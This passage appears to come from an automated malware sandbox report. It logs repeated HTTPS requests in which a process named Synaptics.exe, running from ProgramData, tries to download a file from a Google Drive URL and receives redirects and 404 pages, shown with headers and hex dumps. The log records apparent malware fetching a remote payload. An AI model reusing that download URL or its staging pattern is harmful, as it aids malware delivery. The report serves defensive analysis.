                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-buoqz6Cvmxtk05GJc6e6IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.759828216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Marp_DEBwbrpLR3aS0CSvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.759829216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MkTkVu39GnCUiF-tt0zmyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                47192.168.2.759830142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5QOhT1Ox-1IHWQdpOEuqjpxKxca3vIU_qv37XMUzorx8_8ntkxU8Pik9yFn1VFGR5r
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VBMMo4tlhytV7m-JeknI8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 6c 50 39 51 6d 67 4a 72 63 6e 65 5f 59 59 41 74 36 32 6d 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="OlP9QmgJrcne_YYAt62m5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                48192.168.2.759831142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:23 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6rzlygiI9AhK3gEbQ2zj7iCtVImLxGbukstL1rQ3AyVKcSX4MebzIUqYxmxxVcWGe1KIW1JmA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:23 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GS_ZIsRWBWht0cF8QZUp_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:23 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:23 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 61 75 67 43 71 31 32 4b 6c 41 47 6d 57 50 65 56 4e 39 49 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="-augCq12KlAGmWPeVN9IkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:23 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                49192.168.2.759841216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RQmiKhUHANUbIL5QFcBcww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                50192.168.2.759840216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k37eUgjq2yY-tgq1uhv7Fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                51192.168.2.759844142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6pTz7_MLMcLZK6PSRD0oDQjbhRC1HbAnijRFNAp-meyCWeqEuZ2t-GRn_KmU9jupXA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-4OSBAfeO74D_gU4nrxBmNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 34 72 42 51 39 66 70 76 74 77 72 72 6c 49 47 51 4f 38 6d 34 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="Y4rBQ9fpvtwrrlIGQO8m4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
